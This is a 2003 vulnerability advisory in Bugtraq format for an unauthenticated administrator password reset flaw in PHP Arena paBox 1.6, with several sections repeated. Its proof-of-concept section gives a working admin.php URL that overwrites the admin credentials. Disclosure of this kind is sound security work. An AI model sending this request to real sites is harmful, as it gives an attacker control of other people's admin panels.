PABox Password Reset Vulnerability
BID:8067
Info
PABox Password Reset Vulnerability
| Bugtraq ID: | 8067 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 30 2003 12:00AM |
| Updated: | Jun 30 2003 12:00AM |
| Credit: | Discovery of this issue is credited to silentscripter <[email protected]>. |
| Vulnerable: |
PHP Arena paBox 1.6 |
| Not Vulnerable: | |
Discussion
PABox Password Reset Vulnerability
paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel.
paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel.
Exploit / POC
PABox Password Reset Vulnerability
This issue can be exploited with a web browser. The following example was submitted:
http://www.example.com/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
This issue can be exploited with a web browser. The following example was submitted:
http://www.example.com/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
Solution / Fix
PABox Password Reset Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.